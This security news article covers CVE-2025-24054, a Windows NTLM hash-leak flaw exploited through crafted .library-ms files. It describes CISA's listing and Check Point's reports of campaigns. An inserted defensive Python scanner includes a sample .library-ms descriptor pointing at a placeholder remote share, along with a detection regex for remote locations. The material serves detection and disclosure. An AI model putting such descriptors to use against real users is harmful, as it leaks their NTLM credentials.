CVE-2025-24054 Under Active Attack: Stealing NTLM Credentials During File Download

Following indications of active exploitation in the wild, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a medium-severity security flaw affecting Microsoft Windows to its Known Exploited Vulnerabilities (KEV) list on Thursday.
Microsoft fixed the Windows New Technology LAN Manager (NTLM) hash disclosure spoofing issue last month as part of its Patch Tuesday releases. It was given the CVE identifier CVE-2025-24054 (CVSS score: 6.5).
Last year, Microsoft formally deprecated NTLM, a legacy authentication protocol, in favor of Kerberos. In recent years threat actors have found a number of ways to abuse the protocol, including relay attacks and pass-the-hash, in order to obtain NTLM hashes for further attacks.
“Microsoft Windows NTLM contains an external control of file name or path vulnerability that allows an unauthorized attacker to perform spoofing over a network,” CISA stated.
Microsoft said in a March bulletin that the vulnerability can be triggered by “selecting (single-click), inspecting (right-click), or performing an action other than opening or executing the file,” that is, by minimal interaction with a specially crafted .library-ms file.
Microsoft also credited Rintaro Koike of NTT Security Holdings, 0x6rss, and j00sean with discovering and reporting the vulnerability.
Even though Microsoft rated CVE-2025-24054 as “Exploitation Less Likely,” Check Point reports that the flaw was being actively exploited as of March 19, allowing malicious actors to compromise machines and expose user passwords or NTLM hashes.
According to the cybersecurity firm, “a campaign targeted government and private institutions in Poland and Romania around March 20–21, 2025.” “Attackers used malspam to distribute a Dropbox link containing an archive that exploited multiple known vulnerabilities, including CVE-2025-24054, to harvest NTLMv2-SSP hashes.”
The vulnerability is considered a variant of CVE-2024-43451 (CVSS score: 6.5), which Microsoft fixed in November 2024 and which has also been weaponized in attacks against Colombia and Ukraine by threat actors such as Blind Eagle and UAC-0194.
Check Point says that when the malicious file is delivered inside a ZIP archive, merely downloading and extracting the archive’s contents is enough: Windows Explorer automatically sends an SMB authentication request to a remote server, revealing the user’s NTLM hash.
However, as recently as March 25, 2025, another phishing campaign was observed delivering a file named “Info.doc.library-ms” without any compression. Since the initial wave of attacks, at least ten campaigns with the ultimate goal of harvesting NTLM hashes from targeted victims have been spotted.
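The delivery pattern described above (a .library-ms descriptor, loose or inside a ZIP, that points Explorer at a remote host) can be triaged at the mail gateway or on a sandbox. The script below is an added example, not code from the article or from Check Point: it parses the XML of a .library-ms file using the namespace of Microsoft's Library Description schema and flags any declared location that would make Explorer authenticate to another host. The sample archive, the file name reused from the article, and the placeholder host are constructed inputs.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of Microsoft's Library Description schema used by .library-ms files.
LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# A location that would make Explorer authenticate to another host (UNC/SMB/WebDAV).
REMOTE_RE = re.compile(r"^(\\\\|//|smb:|file://)", re.IGNORECASE)


def remote_targets(xml_bytes: bytes) -> list[str]:
    """Return remote <url> locations declared in one .library-ms document."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:  # malformed descriptor: nothing to report here
        return []
    urls = ((u.text or "").strip() for u in root.iter(LIB_NS + "url"))
    return [u for u in urls if REMOTE_RE.match(u)]


def scan_zip(data: bytes) -> dict[str, list[str]]:
    """Map each .library-ms entry in a ZIP to the remote targets it declares."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".library-ms"):
                hits = remote_targets(zf.read(info))
                if hits:
                    findings[info.filename] = hits
    return findings


# Constructed sample: the host is a placeholder, not an indicator from the article.
SAMPLE_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList><searchConnectorDescription><simpleLocation>
    <url>\\\\placeholder-host.invalid\\share</url>
  </simpleLocation></searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>"""


def build_sample_zip() -> bytes:
    """Build an in-memory archive with one descriptor and one benign file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Info.doc.library-ms", SAMPLE_LIBRARY)
        zf.writestr("readme.txt", "benign text, no library descriptor")
    return buf.getvalue()
```

Running `scan_zip(build_sample_zip())` reports the descriptor and its UNC target; a descriptor whose locations are all local paths produces no finding.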
“These attacks leveraged malicious .library-ms files to collect NTLMv2 hashes and escalate the risk of lateral movement and privilege escalation within compromised networks,” according to Check Point.
“This quick exploitation emphasizes how important it is for businesses to install fixes right away and make sure that NTLM vulnerabilities are fixed in their systems. The issue poses a serious risk because it requires little user involvement to activate and attackers may easily get NTLM hashes, particularly when those hashes can be utilized in pass-the-hash attacks.”
By May 8, 2025, Federal Civilian Executive Branch (FCEB) agencies must apply the required fixes to address the vulnerability and protect their networks from active exploitation.
Source: Hackernews